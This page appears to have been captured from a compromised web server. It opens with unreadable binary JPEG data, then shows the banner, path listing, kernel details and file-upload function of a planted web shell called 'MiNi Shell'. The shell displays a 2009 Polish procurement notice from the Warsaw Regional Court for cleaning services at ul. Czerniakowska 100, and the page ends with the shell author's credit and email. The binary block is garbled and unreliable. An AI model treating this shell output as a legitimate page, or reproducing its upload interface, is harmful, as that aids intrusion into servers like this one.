JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090227/44274-N-2009.html

<p class="kh_header"><b>Warszawa: Świadczenie usługi sprzątania i utrzymania czystości powierzchni wewnętrznych w obiekcie przy ul. Czerniakowskiej 100 w Warszawie, mieszczącym wydziały gospodarcze Sądu Okręgowego w Warszawie i Sądu Rejonowego dla m.st. Warszawy w Warszawie, ZP/G/2/09</b><br>
<b>Numer ogłoszenia: 44274 - 2009; data zamieszczenia: 27.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Okręgowy  w Warszawie , Al. Solidarności 127, 00-898 Warszawa, woj. mazowieckie, tel. 022 4407183, faks 022 4405042.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.warszawa.so.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi sprzątania i utrzymania czystości powierzchni wewnętrznych w obiekcie przy ul. Czerniakowskiej 100 w Warszawie, mieszczącym wydziały gospodarcze Sądu Okręgowego w Warszawie i Sądu Rejonowego dla m.st. Warszawy w Warszawie, ZP/G/2/09.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia jest kompleksowe świadczenie usługi sprzątania i utrzymania czystości powierzchni wewnętrznych obejmujących pomieszczenia, korytarze, klatki schodowe, sanitariaty, windy, archiwa oraz inne wymienione w Załączniku Nr 1 do SIWZ, tj. w szczegółowym opisie przedmiotu zamówienia, w obiekcie przy ul. Czerniakowskiej 100 w Warszawie, mieszczącym wydziały gospodarcze Sądu Okręgowego w Warszawie i Sądu Rejonowego dla m.st. Warszawy w Warszawie.
2) Szczegółowy opis przedmiotu zamówienia zawiera Załącznik Nr 1 do specyfikacji istotnych warunków zamówienia. 
3) Przedmiot zamówienia realizowany będzie zgodnie z postanowieniami projektu umowy stanowiącej Załącznik Nr 4 do specyfikacji istotnych warunków zamówienia. 
4) Miejsce wykonywania zamówienia - obiekt Sądu Okręgowego w Warszawie i Sądu Rejonowego dla m.st. Warszawy w Warszawie przy ul. Czerniakowskiej 100 - zgodnie z Załącznikiem Nr 1 do Specyfikacji Istotnych Warunków Zamówienia. 
5) Zamawiający dopuszcza możliwość udziału podwykonawców przy realizacji niniejszego zamówienia.
6) Przewidywany termin rozpoczęcia wykonywania usługi od dnia 2 maja 2009 roku.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.91.92.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1) O udzielenie zamówienia ubiegać się mogą Wykonawcy składający ważną ofertę, 
którzy spełniają przesłanki z art. 22 ust. 1 ustawy Prawo zamówień publicznych, tzn.:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, 
jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy;
a ponadto:
e) Wykonawcy, którzy należycie wykonali lub w przypadku świadczeń okresowych lub ciągłych należycie wykonują, co najmniej 3 usługi w okresie ostatnich trzech lat (styczeń 2006 r. - styczeń 2009 r.) przed datą wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wielkością usługom stanowiącym przedmiot zamówienia, tj. zrealizowali lub realizują w ww. okresie co najmniej trzy umowy, z których każda obejmuje okres co najmniej 12 miesięcy i dotyczy usługi sprzątania pomieszczeń biurowych o powierzchni min. 10.000 m2 w jednym obiekcie (nie będą zaliczane m.in. hale produkcyjne, sportowe, magazynowe, składowe, centra handlowe, hotele, tereny zewnętrzne, itp.). 
Zamawiający do porównania przyjmie takie zrealizowane lub realizowane zamówienia, dla których określone są: 
1) powierzchnia, 
2) przedmiot, 
3) data rozpoczęcia i zakończenia, 
4) odbiorca.
Spełnienie warunku porównywalności, wymaga bezwzględnego spełnienia łącznie wymienionych przesłanek, a także załączenia dokumentów potwierdzających, że usługi te zostały wykonane należycie. Zamawiający przez usługę porównywalną rozumie zrealizowanie usługi, dotyczącej usługi sprzątania pomieszczeń biurowych o powierzchni min. 10.000 m2 w jednym obiekcie (nie będą zaliczane m.in. hale produkcyjne, sportowe, magazynowe, składowe, centra handlowe, hotele, tereny zewnętrzne, itp.), której czas realizacji na podstawie jednej umowy wynosi co najmniej 12 miesięcy. W przypadku, gdy realizacja usługi nie dotyczy jedynie świadczenia usługi sprzątania pomieszczeń biurowych i z przedstawionych dokumentów potwierdzających należyte wykonanie usługi nie wynika jej wartość oraz wielkość sprzątanej powierzchni w wielkości całego zamówienia, należy w wykazie wskazać wielkość realizacji całej usługi, z wyszczególnieniem wielkości usługi w zakresie świadczenia usługi sprzątania pomieszczeń biurowych, w okresie co najmniej 12 miesięcy (minimum 10.000 m2);
f) Wykonawcy, którzy zapewnią odpowiednią do zakresu zamówienia liczbę pracowników, jaka jest niezbędna do starannego, należytego i kompleksowego wykonania przedmiotu zamówienia, odpowiednio do wielkości powierzchni podlegającej sprzątaniu, wskazanej w Załączniku Nr 1. Zamawiający wymaga by ilość osób do wykonywania usługi w zakresie sprzątania powierzchni wewnętrznych wskazana została przez Wykonawców, przy założeniu dziennej średniej wydajności jednego pracownika wykonującego usługę:
fa) na powierzchniach wewnętrznych - w pokojach, łazienkach, salach rozpraw i holach - do 800 m2 - w ilości minimum 14 (czternaście) osób;
fb) Zamawiający wymaga wyznaczenia i wskazania dodatkowych osób do sprzątania powierzchni archiwum, jeden raz w miesiącu w terminie do 4 (czterech) dni roboczych - w ilości przewidzianej i określonej przez Wykonawców;
fc) Zamawiający wymaga wyznaczenia i wskazania dodatkowo 3 (trzech) osób świadczących serwis dzienny w obiekcie Zamawiającego;
fd) Zamawiający wymaga wyznaczenia w obiekcie Zamawiającego - w ilości minimum 2 (dwóch) osób nadzorujących wykonywanie usługi, w tym jednej osoby nadzorującej wykonywanie usługi w godzinach pracy serwisu dziennego (kierownik obiektu), obecnej w obiekcie w godz. 7.30 do 15.30 oraz jednej osoby nadzorującej wykonywanie usługi po godzinach pracy Zamawiającego, obecnej w obiekcie od godz. 16.00 do zakończenia pracy przez osoby sprzątające.
Zamawiający wymaga dla osób nadzorujących min. 3 letniego stażu pracy 
oraz wykształcenia min. średniego. Osoby nadzorujące wykonanie usługi muszą dysponować telefonami komórkowymi, których numery udostępnione będą pracownikowi Zamawiającego nadzorującemu wykonanie umowy, co umożliwi bezpośrednie przekazywanie uwag dotyczących nieprawidłowego wykonania usługi, zgłaszanych przez użytkowników pomieszczeń, osobie nadzorującej ze strony Wykonawcy wykonanie usługi;
fe) w przewidywanej ilości osób niezbędnych do prawidłowego i należytego wykonania usługi uwzględnić należy absencję z powodu zwolnień lekarskich, urlopów, itp. w ilości minimum 1 (jednej) osoby;
g) Wykonawcy dysponują lub będą dysponować:
ga) przemysłowymi odkurzaczami, w ilości co najmniej jeden odkurzacz dla każdych dwóch osób sprzątających (w zależności od potrzeb - do sprzątania na sucho i na mokro);
gb) profesjonalnymi wózkami serwisowymi do sprzątania, którymi będą wyposażone osoby sprzątające i serwis dzienny - w ilości co najmniej jeden wózek dla dwóch osób, z możliwością przewożenia wiader z wodą, mopów, stosowanego do sprzątania sprzętu i środków itp.;
gb) profesjonalnymi maszynami zamiatającymi, myjącymi, szorującymi, polerującymi, froterkami, w tym co najmniej 1 (jednym) urządzeniem akumulatorowym do czyszczenia (zamiatania, mycia, szorowania, polerowania) posadzek kamiennych (typu Karcher);
gc) wózkami do zwożenia śmieci (odpadów) - minimum 2 wózki mieszczące po kilka worków z odpadami, w celu ich wywiezienia do kontenerów do gromadzenia odpadów, którymi zostaną wyposażone osoby sprzątające; 
gd) środkami czystości, chemicznymi oraz higienicznymi zgodnie z wymaganiami w opisie przedmiotu zamówienia;
h) Wykonawca posiada aktualne ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę co najmniej 300.000,00 złotych (słownie: trzysta tysięcy złotych) oraz zobowiąże się, że w wypadku wyboru jego oferty, o ile suma ubezpieczenia jest mniejsza niż 300.000,00 zł, podwyższy sumę ubezpieczenia do wymaganej kwoty oraz będzie systematycznie przedłużać ubezpieczenie OC w tej wysokości, do czasu wygaśnięcia umowy - co potwierdzi złożeniem wraz z ofertą oświadczenia o zobowiązaniu się do ubezpieczenia się, zgodnie z powyższymi wymogami. 
2) Oferta ma być zgodna w kwestii sposobu jej sporządzenia, oferowanego przedmiotu i warunków zamówienia, ze wszystkimi wymaganiami niniejszej specyfikacji istotnych warunków zamówienia oraz z przepisami ustawy Prawo zamówień publicznych.
3) W pierwszej kolejności ocenie będzie podlegało spełnienie warunków formalnych. W dalszej kolejności zostaną ocenione oferty (spełniające warunki formalne) pod względem merytorycznym.
4) Ocena spełniania warunków udziału w postępowaniu będzie dokonywana poprzez sprawdzenie złożonych dokumentów lub oświadczeń, określonych w specyfikacji istotnych warunków zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Dokumenty wymagane od wykonawcy.
1) W celu wykazania, iż spełnia wymagane warunki, Wykonawca zobowiązany jest dołączyć do oferty wskazane poniżej dokumenty określone w rozporządzeniu Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605 z późn. zm.):
a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
b) aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
c) aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby, albo zamieszkania osoby, której dokumenty dotyczą w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
d) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
e) wykaz co najmniej trzech usług, zrealizowanych lub realizowanych w okresie ostatnich trzech lat, tj. (styczeń 2006 r. - styczeń 2009 r.), a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, z którego wynika, iż Wykonawca należycie zrealizował, co najmniej trzy usługi porównywalne z przedmiotem niniejszego zamówienia, obejmujące okres co najmniej 12 miesięcy, na podstawie jednej umowy każda, polegające na usłudze sprzątania pomieszczeń biurowych o powierzchni min. 10.000 m2 w jednym obiekcie (nie będą zaliczane m.in. hale produkcyjne, sportowe, magazynowe, składowe, centra handlowe, hotele, tereny zewnętrzne, itp.), z podaniem wielkości sprzątanej powierzchni, zakresu wykonywanej usługi, wskazaniem odbiory oraz daty rozpoczęcia i zakończenia realizacji zamówienia, wraz z załączonymi dokumentami potwierdzającymi, że usługi te zostały wykonane należycie. W przypadku usług rozpoczętych, ale nie zakończonych, okres dotychczasowej realizacji usługi wynosi minimum 12 miesięcy;
f) wykaz osób wskazanych przez Wykonawcę do realizacji przedmiotowego zamówienia, którymi Wykonawca dysponuje lub będzie dysponował. W przypadku wskazania w wykazie osób, którymi będzie dysponował Wykonawca należy załączyć pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia - Załącznik Nr 5 do specyfikacji istotnych warunków zamówienia. Zamawiający wymaga, aby Wykonawca wykonywał usługę taką ilością osób, jaka jest niezbędna do starannego, należytego i kompleksowego wykonania przedmiotu zamówienia, odpowiednio do wielkości powierzchni podlegającej sprzątaniu, wskazanej w Załączniku Nr 1 do specyfikacji istotnych warunków zamówienia. W wykazie należy przedstawić informację o ilości osób przeznaczonych do realizacji poszczególnych prac, z przyjętą przez Wykonawcę ilością powierzchni do sprzątania dla poszczególnych osób i wyznaczonym podziałem stref do sprzątania. Do wyliczenia należy przyjąć powierzchnie wskazane w Załączniku Nr 1. 
Dla osób nadzorujących należy przedstawić informacje na temat doświadczenia zawodowego i wykształcenia. Zamawiający wymaga dla osób nadzorujących min. 3 letniego stażu pracy oraz wykształcenia min. średniego. 
Wymagana minimalna liczba osób skierowanych do realizacji przedmiotowego zamówienia (minimum 20 osób):
- 14 osób sprzątających powierzchnie biurowe, tj. pokoje, sale rozpraw, łazienki, hole itp.,
- 1 osobę na zastępstwa (urlopy, zwolnienia),
- 3 osoby serwis dzienny,
- 2 osoby nadzorujące;
g) wykaz narzędzi i urządzeń, jakimi dysponuje lub będzie dysponował wykonawca, niezbędnych do prawidłowego i należytego wykonania usługi zgodnie z wymaganiami Zamawiającego, z proponowaną przez wykonawcę ilością i rodzajem sprzętu i urządzeń, zgodnie z wymaganiami określonymi w warunkach udziału w postępowaniu - Załącznik nr 7. W przypadku, gdy Wykonawca nie dysponuje powyższymi narzędziami i urządzeniami, a wskaże narzędzia i urządzenia, którymi będzie dysponował, wówczas ma obowiązek dołączyć pisemne zobowiązanie innych podmiotów do udostępnienia Wykonawcy tych narzędzi i urządzeń wraz z wykazem środków czystości i chemicznych oraz higienicznych przewidzianych przez Wykonawcę do prawidłowego wykonania zamówienia, zgodnie z wymaganiami w opisie przedmiotu zamówienia - Załącznik nr 7; 
h) polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest  ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę co najmniej 300.000,00 zł (słownie: trzysta tysięcy złotych) w okresie realizacji przedmiotu zamówienia, a w przypadku krótszego okresu ubezpieczenia i/lub niższej wartości ubezpieczenia oświadczenie o zobowiązaniu się do jego przedłużenia lub podwyższenia.
2) Wymagane jest złożenie oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych, na formularzu stanowiącym Załącznik nr 4 do specyfikacji istotnych warunków zamówienia.
3) Wszystkie dokumenty muszą być złożone w formie oryginału lub w formie kserokopii dokumentu, poświadczonej za zgodność z oryginałem przez Wykonawcę. Zamawiający zażąda przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu, gdy przedstawiona przez Wykonawcę kserokopia dokumentu jest nieczytelna lub budzi uzasadnione wątpliwości, do jej prawdziwości, a Zamawiający nie może sprawdzić jej prawdziwości w inny sposób. Dokumenty i oświadczenia sporządzone w języku obcym, muszą być przetłumaczone na język polski przez tłumacza przysięgłego.
4) Brak jakiegokolwiek z ww. dokumentów, złożenie przez Wykonawcę fałszywych 
lub stwierdzających nieprawdę dokumentów, lub złożenie dokumentu w niewłaściwej formie (np. brak poświadczenia za zgodność z oryginałem odpisów lub kopii) spowoduje wykluczenie uczestnika postępowania na podstawie art. 24 ustawy, chyba że zastosowanie znajduje art. 26 ust. 3 ustawy.
5) Zgodnie z treścią art. 26 ust. 3 ustawy, Zamawiający wzywa Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert.
6) Zamawiający wzywa także, w wyznaczonym przez siebie terminie, do złożenia wyjaśnień dotyczących oświadczeń lub dokumentów, potwierdzających spełnianie przez Wykonawców warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez Zamawiającego, nie później niż w dniu wyznaczonym przez Zamawiającego jako termin uzupełnienia oświadczeń lub dokumentów.
2. Oferty wspólne. 
1) Dopuszczalne jest składanie ofert przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia, w tym wspólników spółek cywilnych.
2) Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia, albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
3) Razem z ofertą musi zostać złożone aktualne pełnomocnictwo, oryginał lub notarialnie poświadczona kopia, dla ustanowionego pełnomocnika, określające: którego postępowania dotyczy, kogo ustanawia pełnomocnikiem, jakie podmioty ubiegają się wspólnie o zamówienie jaki jest zakres umocowania (reprezentowanie w trakcie postępowania o udzielenie zamówienia albo reprezentowanie w postępowaniu i zawarcie umowy). Pełnomocnictwo musi być podpisane przez wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia oraz przez ustanowionego pełnomocnika, pod rygorem nieważności. Pełnomocnictwo musi spełniać warunki określone w Rozdziale III. ust. 2 pkt 5 specyfikacji istotnych warunków zamówienia.
4) Do Wykonawców ubiegających się wspólnie o udzielenie zamówienia stosuje się odpowiednio przepisy dotyczące Wykonawcy. W związku z tym, na potwierdzenie spełniania warunków udziału 	w postępowaniu, o których mowa w ust. 1 pkt 1 lit. a-h) wymagane jest złożenie dokumentów określonych w ust. 2 pkt 1 lit. a-d oraz pkt 2 przez każdego z Wykonawców występujących wspólnie; pozostałe dokumenty wymienione w ust. 2 Wykonawcy mogą złożyć wspólnie.
5) Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana Zamawiający może przed zawarciem umowy o zamówienie publiczne żądać umowy regulującej współpracę tych Wykonawców.
3. Oferty składane przez podmioty posiadające siedzibę poza granicami kraju. 
1) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ust. 2 pkt 1 lit. a i d składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, oraz zamiast dokumentów, o których mowa w ust. 2 pkt 1 lit. b składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu- wystawione nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert.
2) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ust. 2 pkt 1. lit. c składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia lub zamieszkania osoby, której dokumenty dotyczą w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3) Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 1 i 2, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego, odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4) Wszelkie dokumenty lub oświadczenia, o których mowa w pkt 1 - 3, składane są w formie określonej w ust. 2 pkt 3.
5) Dokumenty lub oświadczenia sporządzone w języku obcym, należy złożyć wraz z ich tłumaczeniem na język polski poświadczonym przez Wykonawcę. Do tłumaczeń stosuje się zasady opisane w ust. 2 pkt 3..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.warszawa.so.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Okręgowy w Warszawie
Samodzielna Sekcja ds. zamówień publicznych
Al. Solidarności 127
00-898 Warszawa
pok. nr 20.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2009 godzina 10:00, miejsce: Sąd Okręgowy w Warszawie
Samodzielna Sekcja ds. zamówień publicznych
Al. Solidarności 127
00-898 Warszawa
pok. nr 20.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com